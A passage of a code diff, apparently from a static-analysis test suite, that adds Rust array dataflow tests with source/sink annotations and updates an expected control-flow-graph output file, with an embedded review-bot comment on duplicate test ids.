+ sink(n2); // $ MISSING: hasValueFlow=20
+
+ let arr3 = [1, 2, 3];
+ let n3 = arr3[2];
+ sink(n3);
+}
+
+fn array_for_loop() {
+ let arr1 = [1, 2, source(43)];
+ for n1 in arr1 {
+ sink(n1); // $ MISSING: hasValueFlow=43
+ }
+
+ let arr2 = [1, 2, 3];
+ for n2 in arr2 {
+ sink(n2);
+ }
+}
+
+fn array_slice_pattern() {
+ let arr1 = [1, 2, source(43)];
+ match arr1 {
+ [a, b, c] => {
+ sink(a);
+ sink(b);
+ sink(c); // $ MISSING: hasValueFlow=43
+ }
+ }
+}
+
+fn array_assignment() {
+ let mut mut_arr = [1, 2, 3];
+ sink(mut_arr[1]);
+
+ mut_arr[1] = source(55);
+ let d = mut_arr[1];
+ sink(d); // $ MISSING: hasValueFlow=55
+ sink(mut_arr[0]);
+}
+
 fn main() {
 direct();
 variable_usage();
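Review bot: `array_for_loop` and `array_slice_pattern` both use `source(43)`, so their two expectations carry the same tag `hasValueFlow=43` and a result attributed to the wrong source would still read as a match; the other sources in this hunk (94, 20, 55) are distinct. Give one of them its own id, for example `let arr1 = [1, 2, source(44)];` with `sink(c); // $ MISSING: hasValueFlow=44` in `array_slice_pattern` (44 is a constructed value; pick one not already used in main.rs, which is only partly visible here). In `array_assignment`, the unannotated `sink(mut_arr[0]);` after `mut_arr[1] = source(55);` asserts that no flow is reported there, which an array model that does not distinguish indices would presumably not satisfy, so a comment such as `// no flow expected: only index 1 is written from a source` would make the intent explicit. The `MISSING` lines record known false negatives of the analysis, so keeping each one uniquely identifiable matters until array content flow is implemented.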
@@ -334,4 +384,8 @@ fn main() {
 block_expression1();
 block_expression2(true);
 block_expression3(true);
+ array_lookup();
+ array_for_loop();
+ array_slice_pattern();
+ array_assignment();
 }
diff --git a/rust/ql/test/library-tests/variables/Cfg.expected b/rust/ql/test/library-tests/variables/Cfg.expected
index 6b979eac0da..a86cca703bb 100644
--- a/rust/ql/test/library-tests/variables/Cfg.expected
+++ b/rust/ql/test/library-tests/variables/Cfg.expected
@@ -1116,163 +1116,203 @@ edges | variables.rs:497:5:497:26 | ExprStmt | variables.rs:497:5:497:13 | print_i64 | | | variables.rs:497:15:497:15 | a | variables.rs:497:15:497:24 | ... .my_get(...) | | | variables.rs:497:15:497:24 | ... .my_get(...) | variables.rs:497:5:497:25 | print_i64(...) | | -| variables.rs:500:1:507:1 | enter fn ref_arg | variables.rs:501:5:501:15 | let ... = 16 | | -| variables.rs:500:1:507:1 | exit fn ref_arg (normal) | variables.rs:500:1:507:1 | exit fn ref_arg | | -| variables.rs:500:14:507:1 | { ... } | variables.rs:500:1:507:1 | exit fn ref_arg (normal) | | -| variables.rs:501:5:501:15 | let ... = 16 | variables.rs:501:13:501:14 | 16 | | -| variables.rs:501:9:501:9 | x | variables.rs:502:5:502:22 | ExprStmt | match | -| variables.rs:501:13:501:14 | 16 | variables.rs:501:9:501:9 | x | | -| variables.rs:502:5:502:17 | print_i64_ref | variables.rs:502:20:502:20 | x | | -| variables.rs:502:5:502:21 | print_i64_ref(...) | variables.rs:503:5:503:17 | ExprStmt | | -| variables.rs:502:5:502:22 | ExprStmt | variables.rs:502:5:502:17 | print_i64_ref | | -| variables.rs:502:19:502:20 | &x | variables.rs:502:5:502:21 | print_i64_ref(...) | | -| variables.rs:502:20:502:20 | x | variables.rs:502:19:502:20 | &x | | -| variables.rs:503:5:503:13 | print_i64 | variables.rs:503:15:503:15 | x | | -| variables.rs:503:5:503:16 | print_i64(...) | variables.rs:505:5:505:15 | let ... = 17 | | -| variables.rs:503:5:503:17 | ExprStmt | variables.rs:503:5:503:13 | print_i64 | | -| variables.rs:503:15:503:15 | x | variables.rs:503:5:503:16 | print_i64(...) | | -| variables.rs:505:5:505:15 | let ... = 17 | variables.rs:505:13:505:14 | 17 | | -| variables.rs:505:9:505:9 | z | variables.rs:506:5:506:22 | ExprStmt | match | -| variables.rs:505:13:505:14 | 17 | variables.rs:505:9:505:9 | z | | -| variables.rs:506:5:506:17 | print_i64_ref | variables.rs:506:20:506:20 | z | | -| variables.rs:506:5:506:21 | print_i64_ref(...) | variables.rs:500:14:507:1 | { ... 
} | | -| variables.rs:506:5:506:22 | ExprStmt | variables.rs:506:5:506:17 | print_i64_ref | | -| variables.rs:506:19:506:20 | &z | variables.rs:506:5:506:21 | print_i64_ref(...) | | -| variables.rs:506:20:506:20 | z | variables.rs:506:19:506:20 | &z | | -| variables.rs:514:3:516:3 | enter fn bar | variables.rs:514:15:514:18 | self | | -| variables.rs:514:3:516:3 | exit fn bar (normal) | variables.rs:514:3:516:3 | exit fn bar | | -| variables.rs:514:10:514:18 | SelfParam | variables.rs:515:5:515:32 | ExprStmt | | -| variables.rs:514:15:514:18 | self | variables.rs:514:10:514:18 | SelfParam | | -| variables.rs:514:21:516:3 | { ... } | variables.rs:514:3:516:3 | exit fn bar (normal) | | -| variables.rs:515:5:515:9 | * ... | variables.rs:515:29:515:29 | 3 | | -| variables.rs:515:5:515:31 | ... = ... | variables.rs:514:21:516:3 | { ... } | | -| variables.rs:515:5:515:32 | ExprStmt | variables.rs:515:6:515:9 | self | | -| variables.rs:515:6:515:9 | self | variables.rs:515:5:515:9 | * ... | | -| variables.rs:515:13:515:31 | MyStruct {...} | variables.rs:515:5:515:31 | ... = ... | | -| variables.rs:515:29:515:29 | 3 | variables.rs:515:13:515:31 | MyStruct {...} | | -| variables.rs:519:1:524:1 | enter fn ref_methodcall_receiver | variables.rs:520:3:520:34 | let ... = ... | | -| variables.rs:519:1:524:1 | exit fn ref_methodcall_receiver (normal) | variables.rs:519:1:524:1 | exit fn ref_methodcall_receiver | | -| variables.rs:519:30:524:1 | { ... } | variables.rs:519:1:524:1 | exit fn ref_methodcall_receiver (normal) | | -| variables.rs:520:3:520:34 | let ... = ... | variables.rs:520:31:520:31 | 1 | | -| variables.rs:520:7:520:11 | a | variables.rs:521:3:521:10 | ExprStmt | match | -| variables.rs:520:15:520:33 | MyStruct {...} | variables.rs:520:7:520:11 | a | | -| variables.rs:520:31:520:31 | 1 | variables.rs:520:15:520:33 | MyStruct {...} | | -| variables.rs:521:3:521:3 | a | variables.rs:521:3:521:9 | ... .bar(...) | | -| variables.rs:521:3:521:9 | ... .bar(...) 
| variables.rs:523:3:523:19 | ExprStmt | | -| variables.rs:521:3:521:10 | ExprStmt | variables.rs:521:3:521:3 | a | | -| variables.rs:523:3:523:11 | print_i64 | variables.rs:523:13:523:13 | a | | -| variables.rs:523:3:523:18 | print_i64(...) | variables.rs:519:30:524:1 | { ... } | | -| variables.rs:523:3:523:19 | ExprStmt | variables.rs:523:3:523:11 | print_i64 | | -| variables.rs:523:13:523:13 | a | variables.rs:523:13:523:17 | a.val | | -| variables.rs:523:13:523:17 | a.val | variables.rs:523:3:523:18 | print_i64(...) | | -| variables.rs:526:1:560:1 | enter fn main | variables.rs:527:5:527:25 | ExprStmt | | -| variables.rs:526:1:560:1 | exit fn main (normal) | variables.rs:526:1:560:1 | exit fn main | | -| variables.rs:526:11:560:1 | { ... } | variables.rs:526:1:560:1 | exit fn main (normal) | | -| variables.rs:527:5:527:22 | immutable_variable | variables.rs:527:5:527:24 | immutable_variable(...) | | -| variables.rs:527:5:527:24 | immutable_variable(...) | variables.rs:528:5:528:23 | ExprStmt | | -| variables.rs:527:5:527:25 | ExprStmt | variables.rs:527:5:527:22 | immutable_variable | | -| variables.rs:528:5:528:20 | mutable_variable | variables.rs:528:5:528:22 | mutable_variable(...) | | -| variables.rs:528:5:528:22 | mutable_variable(...) | variables.rs:529:5:529:40 | ExprStmt | | -| variables.rs:528:5:528:23 | ExprStmt | variables.rs:528:5:528:20 | mutable_variable | | -| variables.rs:529:5:529:37 | mutable_variable_immutable_borrow | variables.rs:529:5:529:39 | mutable_variable_immutable_borrow(...) | | -| variables.rs:529:5:529:39 | mutable_variable_immutable_borrow(...) | variables.rs:530:5:530:23 | ExprStmt | | -| variables.rs:529:5:529:40 | ExprStmt | variables.rs:529:5:529:37 | mutable_variable_immutable_borrow | | -| variables.rs:530:5:530:20 | variable_shadow1 | variables.rs:530:5:530:22 | variable_shadow1(...) | | -| variables.rs:530:5:530:22 | variable_shadow1(...) 
| variables.rs:531:5:531:23 | ExprStmt | | -| variables.rs:530:5:530:23 | ExprStmt | variables.rs:530:5:530:20 | variable_shadow1 | | -| variables.rs:531:5:531:20 | variable_shadow2 | variables.rs:531:5:531:22 | variable_shadow2(...) | | -| variables.rs:531:5:531:22 | variable_shadow2(...) | variables.rs:532:5:532:19 | ExprStmt | | -| variables.rs:531:5:531:23 | ExprStmt | variables.rs:531:5:531:20 | variable_shadow2 | | -| variables.rs:532:5:532:16 | let_pattern1 | variables.rs:532:5:532:18 | let_pattern1(...) | | -| variables.rs:532:5:532:18 | let_pattern1(...) | variables.rs:533:5:533:19 | ExprStmt | | -| variables.rs:532:5:532:19 | ExprStmt | variables.rs:532:5:532:16 | let_pattern1 | | -| variables.rs:533:5:533:16 | let_pattern2 | variables.rs:533:5:533:18 | let_pattern2(...) | | -| variables.rs:533:5:533:18 | let_pattern2(...) | variables.rs:534:5:534:19 | ExprStmt | | -| variables.rs:533:5:533:19 | ExprStmt | variables.rs:533:5:533:16 | let_pattern2 | | -| variables.rs:534:5:534:16 | let_pattern3 | variables.rs:534:5:534:18 | let_pattern3(...) | | -| variables.rs:534:5:534:18 | let_pattern3(...) | variables.rs:535:5:535:19 | ExprStmt | | -| variables.rs:534:5:534:19 | ExprStmt | variables.rs:534:5:534:16 | let_pattern3 | | -| variables.rs:535:5:535:16 | let_pattern4 | variables.rs:535:5:535:18 | let_pattern4(...) | | -| variables.rs:535:5:535:18 | let_pattern4(...) | variables.rs:536:5:536:21 | ExprStmt | | -| variables.rs:535:5:535:19 | ExprStmt | variables.rs:535:5:535:16 | let_pattern4 | | -| variables.rs:536:5:536:18 | match_pattern1 | variables.rs:536:5:536:20 | match_pattern1(...) | | -| variables.rs:536:5:536:20 | match_pattern1(...) | variables.rs:537:5:537:21 | ExprStmt | | -| variables.rs:536:5:536:21 | ExprStmt | variables.rs:536:5:536:18 | match_pattern1 | | -| variables.rs:537:5:537:18 | match_pattern2 | variables.rs:537:5:537:20 | match_pattern2(...) | | -| variables.rs:537:5:537:20 | match_pattern2(...) 
| variables.rs:538:5:538:21 | ExprStmt | | -| variables.rs:537:5:537:21 | ExprStmt | variables.rs:537:5:537:18 | match_pattern2 | | -| variables.rs:538:5:538:18 | match_pattern3 | variables.rs:538:5:538:20 | match_pattern3(...) | | -| variables.rs:538:5:538:20 | match_pattern3(...) | variables.rs:539:5:539:21 | ExprStmt | | -| variables.rs:538:5:538:21 | ExprStmt | variables.rs:538:5:538:18 | match_pattern3 | | -| variables.rs:539:5:539:18 | match_pattern4 | variables.rs:539:5:539:20 | match_pattern4(...) | | -| variables.rs:539:5:539:20 | match_pattern4(...) | variables.rs:540:5:540:21 | ExprStmt | | -| variables.rs:539:5:539:21 | ExprStmt | variables.rs:539:5:539:18 | match_pattern4 | | -| variables.rs:540:5:540:18 | match_pattern5 | variables.rs:540:5:540:20 | match_pattern5(...) | | -| variables.rs:540:5:540:20 | match_pattern5(...) | variables.rs:541:5:541:21 | ExprStmt | | -| variables.rs:540:5:540:21 | ExprStmt | variables.rs:540:5:540:18 | match_pattern5 | | -| variables.rs:541:5:541:18 | match_pattern6 | variables.rs:541:5:541:20 | match_pattern6(...) | | -| variables.rs:541:5:541:20 | match_pattern6(...) | variables.rs:542:5:542:21 | ExprStmt | | -| variables.rs:541:5:541:21 | ExprStmt | variables.rs:541:5:541:18 | match_pattern6 | | -| variables.rs:542:5:542:18 | match_pattern7 | variables.rs:542:5:542:20 | match_pattern7(...) | | -| variables.rs:542:5:542:20 | match_pattern7(...) | variables.rs:543:5:543:21 | ExprStmt | | -| variables.rs:542:5:542:21 | ExprStmt | variables.rs:542:5:542:18 | match_pattern7 | | -| variables.rs:543:5:543:18 | match_pattern8 | variables.rs:543:5:543:20 | match_pattern8(...) | | -| variables.rs:543:5:543:20 | match_pattern8(...) | variables.rs:544:5:544:21 | ExprStmt | | -| variables.rs:543:5:543:21 | ExprStmt | variables.rs:543:5:543:18 | match_pattern8 | | -| variables.rs:544:5:544:18 | match_pattern9 | variables.rs:544:5:544:20 | match_pattern9(...) | | -| variables.rs:544:5:544:20 | match_pattern9(...) 
| variables.rs:545:5:545:36 | ExprStmt | | -| variables.rs:544:5:544:21 | ExprStmt | variables.rs:544:5:544:18 | match_pattern9 | | -| variables.rs:545:5:545:18 | param_pattern1 | variables.rs:545:20:545:22 | "a" | | -| variables.rs:545:5:545:35 | param_pattern1(...) | variables.rs:546:5:546:37 | ExprStmt | | -| variables.rs:545:5:545:36 | ExprStmt | variables.rs:545:5:545:18 | param_pattern1 | | -| variables.rs:545:20:545:22 | "a" | variables.rs:545:26:545:28 | "b" | | -| variables.rs:545:25:545:34 | TupleExpr | variables.rs:545:5:545:35 | param_pattern1(...) | | -| variables.rs:545:26:545:28 | "b" | variables.rs:545:31:545:33 | "c" | | -| variables.rs:545:31:545:33 | "c" | variables.rs:545:25:545:34 | TupleExpr | | -| variables.rs:546:5:546:18 | param_pattern2 | variables.rs:546:20:546:31 | ...::Left | | -| variables.rs:546:5:546:36 | param_pattern2(...) | variables.rs:547:5:547:26 | ExprStmt | | -| variables.rs:546:5:546:37 | ExprStmt | variables.rs:546:5:546:18 | param_pattern2 | | -| variables.rs:546:20:546:31 | ...::Left | variables.rs:546:33:546:34 | 45 | | -| variables.rs:546:20:546:35 | ...::Left(...) | variables.rs:546:5:546:36 | param_pattern2(...) | | -| variables.rs:546:33:546:34 | 45 | variables.rs:546:20:546:35 | ...::Left(...) | | -| variables.rs:547:5:547:23 | destruct_assignment | variables.rs:547:5:547:25 | destruct_assignment(...) | | -| variables.rs:547:5:547:25 | destruct_assignment(...) | variables.rs:548:5:548:23 | ExprStmt | | -| variables.rs:547:5:547:26 | ExprStmt | variables.rs:547:5:547:23 | destruct_assignment | | -| variables.rs:548:5:548:20 | closure_variable | variables.rs:548:5:548:22 | closure_variable(...) | | -| variables.rs:548:5:548:22 | closure_variable(...) | variables.rs:549:5:549:19 | ExprStmt | | -| variables.rs:548:5:548:23 | ExprStmt | variables.rs:548:5:548:20 | closure_variable | | -| variables.rs:549:5:549:16 | for_variable | variables.rs:549:5:549:18 | for_variable(...) 
| | -| variables.rs:549:5:549:18 | for_variable(...) | variables.rs:550:5:550:17 | ExprStmt | | -| variables.rs:549:5:549:19 | ExprStmt | variables.rs:549:5:549:16 | for_variable | | -| variables.rs:550:5:550:14 | add_assign | variables.rs:550:5:550:16 | add_assign(...) | | -| variables.rs:550:5:550:16 | add_assign(...) | variables.rs:551:5:551:13 | ExprStmt | | -| variables.rs:550:5:550:17 | ExprStmt | variables.rs:550:5:550:14 | add_assign | | -| variables.rs:551:5:551:10 | mutate | variables.rs:551:5:551:12 | mutate(...) | | -| variables.rs:551:5:551:12 | mutate(...) | variables.rs:552:5:552:17 | ExprStmt | | -| variables.rs:551:5:551:13 | ExprStmt | variables.rs:551:5:551:10 | mutate | | -| variables.rs:552:5:552:14 | mutate_arg | variables.rs:552:5:552:16 | mutate_arg(...) | | -| variables.rs:552:5:552:16 | mutate_arg(...) | variables.rs:553:5:553:12 | ExprStmt | | -| variables.rs:552:5:552:17 | ExprStmt | variables.rs:552:5:552:14 | mutate_arg | | -| variables.rs:553:5:553:9 | alias | variables.rs:553:5:553:11 | alias(...) | | -| variables.rs:553:5:553:11 | alias(...) | variables.rs:554:5:554:18 | ExprStmt | | -| variables.rs:553:5:553:12 | ExprStmt | variables.rs:553:5:553:9 | alias | | -| variables.rs:554:5:554:15 | capture_mut | variables.rs:554:5:554:17 | capture_mut(...) | | -| variables.rs:554:5:554:17 | capture_mut(...) | variables.rs:555:5:555:20 | ExprStmt | | -| variables.rs:554:5:554:18 | ExprStmt | variables.rs:554:5:554:15 | capture_mut | | -| variables.rs:555:5:555:17 | capture_immut | variables.rs:555:5:555:19 | capture_immut(...) | | -| variables.rs:555:5:555:19 | capture_immut(...) | variables.rs:556:5:556:26 | ExprStmt | | -| variables.rs:555:5:555:20 | ExprStmt | variables.rs:555:5:555:17 | capture_immut | | -| variables.rs:556:5:556:23 | async_block_capture | variables.rs:556:5:556:25 | async_block_capture(...) | | -| variables.rs:556:5:556:25 | async_block_capture(...) 
| variables.rs:557:5:557:14 | ExprStmt | | -| variables.rs:556:5:556:26 | ExprStmt | variables.rs:556:5:556:23 | async_block_capture | | -| variables.rs:557:5:557:11 | structs | variables.rs:557:5:557:13 | structs(...) | | -| variables.rs:557:5:557:13 | structs(...) | variables.rs:558:5:558:14 | ExprStmt | | -| variables.rs:557:5:557:14 | ExprStmt | variables.rs:557:5:557:11 | structs | | -| variables.rs:558:5:558:11 | ref_arg | variables.rs:558:5:558:13 | ref_arg(...) | | -| variables.rs:558:5:558:13 | ref_arg(...) | variables.rs:559:5:559:30 | ExprStmt | | -| variables.rs:558:5:558:14 | ExprStmt | variables.rs:558:5:558:11 | ref_arg | | -| variables.rs:559:5:559:27 | ref_methodcall_receiver | variables.rs:559:5:559:29 | ref_methodcall_receiver(...) | | -| variables.rs:559:5:559:29 | ref_methodcall_receiver(...) | variables.rs:526:11:560:1 | { ... } | | -| variables.rs:559:5:559:30 | ExprStmt | variables.rs:559:5:559:27 | ref_methodcall_receiver | | +| variables.rs:500:1:507:1 | enter fn arrays | variables.rs:501:5:501:26 | let ... = ... | | +| variables.rs:500:1:507:1 | exit fn arrays (normal) | variables.rs:500:1:507:1 | exit fn arrays | | +| variables.rs:500:13:507:1 | { ... } | variables.rs:500:1:507:1 | exit fn arrays (normal) | | +| variables.rs:501:5:501:26 | let ... = ... | variables.rs:501:18:501:18 | 1 | | +| variables.rs:501:9:501:13 | a | variables.rs:502:5:502:20 | ExprStmt | match | +| variables.rs:501:17:501:25 | [...] | variables.rs:501:9:501:13 | a | | +| variables.rs:501:18:501:18 | 1 | variables.rs:501:21:501:21 | 2 | | +| variables.rs:501:21:501:21 | 2 | variables.rs:501:24:501:24 | 3 | | +| variables.rs:501:24:501:24 | 3 | variables.rs:501:17:501:25 | [...] | | +| variables.rs:502:5:502:13 | print_i64 | variables.rs:502:15:502:15 | a | | +| variables.rs:502:5:502:19 | print_i64(...) 
| variables.rs:503:5:503:13 | ExprStmt | | +| variables.rs:502:5:502:20 | ExprStmt | variables.rs:502:5:502:13 | print_i64 | | +| variables.rs:502:15:502:15 | a | variables.rs:502:17:502:17 | 0 | | +| variables.rs:502:15:502:18 | a[0] | variables.rs:502:5:502:19 | print_i64(...) | | +| variables.rs:502:17:502:17 | 0 | variables.rs:502:15:502:18 | a[0] | | +| variables.rs:503:5:503:5 | a | variables.rs:503:7:503:7 | 1 | | +| variables.rs:503:5:503:8 | a[1] | variables.rs:503:12:503:12 | 5 | | +| variables.rs:503:5:503:12 | ... = ... | variables.rs:504:5:504:20 | ExprStmt | | +| variables.rs:503:5:503:13 | ExprStmt | variables.rs:503:5:503:5 | a | | +| variables.rs:503:7:503:7 | 1 | variables.rs:503:5:503:8 | a[1] | | +| variables.rs:503:12:503:12 | 5 | variables.rs:503:5:503:12 | ... = ... | | +| variables.rs:504:5:504:13 | print_i64 | variables.rs:504:15:504:15 | a | | +| variables.rs:504:5:504:19 | print_i64(...) | variables.rs:505:5:505:18 | ExprStmt | | +| variables.rs:504:5:504:20 | ExprStmt | variables.rs:504:5:504:13 | print_i64 | | +| variables.rs:504:15:504:15 | a | variables.rs:504:17:504:17 | 1 | | +| variables.rs:504:15:504:18 | a[1] | variables.rs:504:5:504:19 | print_i64(...) | | +| variables.rs:504:17:504:17 | 1 | variables.rs:504:15:504:18 | a[1] | | +| variables.rs:505:5:505:5 | a | variables.rs:505:10:505:10 | 4 | | +| variables.rs:505:5:505:17 | ... = ... | variables.rs:506:5:506:20 | ExprStmt | | +| variables.rs:505:5:505:18 | ExprStmt | variables.rs:505:5:505:5 | a | | +| variables.rs:505:9:505:17 | [...] | variables.rs:505:5:505:17 | ... = ... | | +| variables.rs:505:10:505:10 | 4 | variables.rs:505:13:505:13 | 5 | | +| variables.rs:505:13:505:13 | 5 | variables.rs:505:16:505:16 | 6 | | +| variables.rs:505:16:505:16 | 6 | variables.rs:505:9:505:17 | [...] | | +| variables.rs:506:5:506:13 | print_i64 | variables.rs:506:15:506:15 | a | | +| variables.rs:506:5:506:19 | print_i64(...) | variables.rs:500:13:507:1 | { ... 
} | | +| variables.rs:506:5:506:20 | ExprStmt | variables.rs:506:5:506:13 | print_i64 | | +| variables.rs:506:15:506:15 | a | variables.rs:506:17:506:17 | 2 | | +| variables.rs:506:15:506:18 | a[2] | variables.rs:506:5:506:19 | print_i64(...) | | +| variables.rs:506:17:506:17 | 2 | variables.rs:506:15:506:18 | a[2] | | +| variables.rs:509:1:516:1 | enter fn ref_arg | variables.rs:510:5:510:15 | let ... = 16 | | +| variables.rs:509:1:516:1 | exit fn ref_arg (normal) | variables.rs:509:1:516:1 | exit fn ref_arg | | +| variables.rs:509:14:516:1 | { ... } | variables.rs:509:1:516:1 | exit fn ref_arg (normal) | | +| variables.rs:510:5:510:15 | let ... = 16 | variables.rs:510:13:510:14 | 16 | | +| variables.rs:510:9:510:9 | x | variables.rs:511:5:511:22 | ExprStmt | match | +| variables.rs:510:13:510:14 | 16 | variables.rs:510:9:510:9 | x | | +| variables.rs:511:5:511:17 | print_i64_ref | variables.rs:511:20:511:20 | x | | +| variables.rs:511:5:511:21 | print_i64_ref(...) | variables.rs:512:5:512:17 | ExprStmt | | +| variables.rs:511:5:511:22 | ExprStmt | variables.rs:511:5:511:17 | print_i64_ref | | +| variables.rs:511:19:511:20 | &x | variables.rs:511:5:511:21 | print_i64_ref(...) | | +| variables.rs:511:20:511:20 | x | variables.rs:511:19:511:20 | &x | | +| variables.rs:512:5:512:13 | print_i64 | variables.rs:512:15:512:15 | x | | +| variables.rs:512:5:512:16 | print_i64(...) | variables.rs:514:5:514:15 | let ... = 17 | | +| variables.rs:512:5:512:17 | ExprStmt | variables.rs:512:5:512:13 | print_i64 | | +| variables.rs:512:15:512:15 | x | variables.rs:512:5:512:16 | print_i64(...) | | +| variables.rs:514:5:514:15 | let ... = 17 | variables.rs:514:13:514:14 | 17 | | +| variables.rs:514:9:514:9 | z | variables.rs:515:5:515:22 | ExprStmt | match | +| variables.rs:514:13:514:14 | 17 | variables.rs:514:9:514:9 | z | | +| variables.rs:515:5:515:17 | print_i64_ref | variables.rs:515:20:515:20 | z | | +| variables.rs:515:5:515:21 | print_i64_ref(...) 
| variables.rs:509:14:516:1 | { ... } | | +| variables.rs:515:5:515:22 | ExprStmt | variables.rs:515:5:515:17 | print_i64_ref | | +| variables.rs:515:19:515:20 | &z | variables.rs:515:5:515:21 | print_i64_ref(...) | | +| variables.rs:515:20:515:20 | z | variables.rs:515:19:515:20 | &z | | +| variables.rs:523:3:525:3 | enter fn bar | variables.rs:523:15:523:18 | self | | +| variables.rs:523:3:525:3 | exit fn bar (normal) | variables.rs:523:3:525:3 | exit fn bar | | +| variables.rs:523:10:523:18 | SelfParam | variables.rs:524:5:524:32 | ExprStmt | | +| variables.rs:523:15:523:18 | self | variables.rs:523:10:523:18 | SelfParam | | +| variables.rs:523:21:525:3 | { ... } | variables.rs:523:3:525:3 | exit fn bar (normal) | | +| variables.rs:524:5:524:9 | * ... | variables.rs:524:29:524:29 | 3 | | +| variables.rs:524:5:524:31 | ... = ... | variables.rs:523:21:525:3 | { ... } | | +| variables.rs:524:5:524:32 | ExprStmt | variables.rs:524:6:524:9 | self | | +| variables.rs:524:6:524:9 | self | variables.rs:524:5:524:9 | * ... | | +| variables.rs:524:13:524:31 | MyStruct {...} | variables.rs:524:5:524:31 | ... = ... | | +| variables.rs:524:29:524:29 | 3 | variables.rs:524:13:524:31 | MyStruct {...} | | +| variables.rs:528:1:533:1 | enter fn ref_methodcall_receiver | variables.rs:529:3:529:34 | let ... = ... | | +| variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver (normal) | variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver | | +| variables.rs:528:30:533:1 | { ... } | variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver (normal) | | +| variables.rs:529:3:529:34 | let ... = ... | variables.rs:529:31:529:31 | 1 | | +| variables.rs:529:7:529:11 | a | variables.rs:530:3:530:10 | ExprStmt | match | +| variables.rs:529:15:529:33 | MyStruct {...} | variables.rs:529:7:529:11 | a | | +| variables.rs:529:31:529:31 | 1 | variables.rs:529:15:529:33 | MyStruct {...} | | +| variables.rs:530:3:530:3 | a | variables.rs:530:3:530:9 | ... .bar(...) 
| | +| variables.rs:530:3:530:9 | ... .bar(...) | variables.rs:532:3:532:19 | ExprStmt | | +| variables.rs:530:3:530:10 | ExprStmt | variables.rs:530:3:530:3 | a | | +| variables.rs:532:3:532:11 | print_i64 | variables.rs:532:13:532:13 | a | | +| variables.rs:532:3:532:18 | print_i64(...) | variables.rs:528:30:533:1 | { ... } | | +| variables.rs:532:3:532:19 | ExprStmt | variables.rs:532:3:532:11 | print_i64 | | +| variables.rs:532:13:532:13 | a | variables.rs:532:13:532:17 | a.val | | +| variables.rs:532:13:532:17 | a.val | variables.rs:532:3:532:18 | print_i64(...) | | +| variables.rs:535:1:569:1 | enter fn main | variables.rs:536:5:536:25 | ExprStmt | | +| variables.rs:535:1:569:1 | exit fn main (normal) | variables.rs:535:1:569:1 | exit fn main | | +| variables.rs:535:11:569:1 | { ... } | variables.rs:535:1:569:1 | exit fn main (normal) | | +| variables.rs:536:5:536:22 | immutable_variable | variables.rs:536:5:536:24 | immutable_variable(...) | | +| variables.rs:536:5:536:24 | immutable_variable(...) | variables.rs:537:5:537:23 | ExprStmt | | +| variables.rs:536:5:536:25 | ExprStmt | variables.rs:536:5:536:22 | immutable_variable | | +| variables.rs:537:5:537:20 | mutable_variable | variables.rs:537:5:537:22 | mutable_variable(...) | | +| variables.rs:537:5:537:22 | mutable_variable(...) | variables.rs:538:5:538:40 | ExprStmt | | +| variables.rs:537:5:537:23 | ExprStmt | variables.rs:537:5:537:20 | mutable_variable | | +| variables.rs:538:5:538:37 | mutable_variable_immutable_borrow | variables.rs:538:5:538:39 | mutable_variable_immutable_borrow(...) | | +| variables.rs:538:5:538:39 | mutable_variable_immutable_borrow(...) | variables.rs:539:5:539:23 | ExprStmt | | +| variables.rs:538:5:538:40 | ExprStmt | variables.rs:538:5:538:37 | mutable_variable_immutable_borrow | | +| variables.rs:539:5:539:20 | variable_shadow1 | variables.rs:539:5:539:22 | variable_shadow1(...) | | +| variables.rs:539:5:539:22 | variable_shadow1(...) 
| variables.rs:540:5:540:23 | ExprStmt | | +| variables.rs:539:5:539:23 | ExprStmt | variables.rs:539:5:539:20 | variable_shadow1 | | +| variables.rs:540:5:540:20 | variable_shadow2 | variables.rs:540:5:540:22 | variable_shadow2(...) | | +| variables.rs:540:5:540:22 | variable_shadow2(...) | variables.rs:541:5:541:19 | ExprStmt | | +| variables.rs:540:5:540:23 | ExprStmt | variables.rs:540:5:540:20 | variable_shadow2 | | +| variables.rs:541:5:541:16 | let_pattern1 | variables.rs:541:5:541:18 | let_pattern1(...) | | +| variables.rs:541:5:541:18 | let_pattern1(...) | variables.rs:542:5:542:19 | ExprStmt | | +| variables.rs:541:5:541:19 | ExprStmt | variables.rs:541:5:541:16 | let_pattern1 | | +| variables.rs:542:5:542:16 | let_pattern2 | variables.rs:542:5:542:18 | let_pattern2(...) | | +| variables.rs:542:5:542:18 | let_pattern2(...) | variables.rs:543:5:543:19 | ExprStmt | | +| variables.rs:542:5:542:19 | ExprStmt | variables.rs:542:5:542:16 | let_pattern2 | | +| variables.rs:543:5:543:16 | let_pattern3 | variables.rs:543:5:543:18 | let_pattern3(...) | | +| variables.rs:543:5:543:18 | let_pattern3(...) | variables.rs:544:5:544:19 | ExprStmt | | +| variables.rs:543:5:543:19 | ExprStmt | variables.rs:543:5:543:16 | let_pattern3 | | +| variables.rs:544:5:544:16 | let_pattern4 | variables.rs:544:5:544:18 | let_pattern4(...) | | +| variables.rs:544:5:544:18 | let_pattern4(...) | variables.rs:545:5:545:21 | ExprStmt | | +| variables.rs:544:5:544:19 | ExprStmt | variables.rs:544:5:544:16 | let_pattern4 | | +| variables.rs:545:5:545:18 | match_pattern1 | variables.rs:545:5:545:20 | match_pattern1(...) | | +| variables.rs:545:5:545:20 | match_pattern1(...) | variables.rs:546:5:546:21 | ExprStmt | | +| variables.rs:545:5:545:21 | ExprStmt | variables.rs:545:5:545:18 | match_pattern1 | | +| variables.rs:546:5:546:18 | match_pattern2 | variables.rs:546:5:546:20 | match_pattern2(...) | | +| variables.rs:546:5:546:20 | match_pattern2(...) 
| variables.rs:547:5:547:21 | ExprStmt | | +| variables.rs:546:5:546:21 | ExprStmt | variables.rs:546:5:546:18 | match_pattern2 | | +| variables.rs:547:5:547:18 | match_pattern3 | variables.rs:547:5:547:20 | match_pattern3(...) | | +| variables.rs:547:5:547:20 | match_pattern3(...) | variables.rs:548:5:548:21 | ExprStmt | | +| variables.rs:547:5:547:21 | ExprStmt | variables.rs:547:5:547:18 | match_pattern3 | | +| variables.rs:548:5:548:18 | match_pattern4 | variables.rs:548:5:548:20 | match_pattern4(...) | | +| variables.rs:548:5:548:20 | match_pattern4(...) | variables.rs:549:5:549:21 | ExprStmt | | +| variables.rs:548:5:548:21 | ExprStmt | variables.rs:548:5:548:18 | match_pattern4 | | +| variables.rs:549:5:549:18 | match_pattern5 | variables.rs:549:5:549:20 | match_pattern5(...) | | +| variables.rs:549:5:549:20 | match_pattern5(...) | variables.rs:550:5:550:21 | ExprStmt | | +| variables.rs:549:5:549:21 | 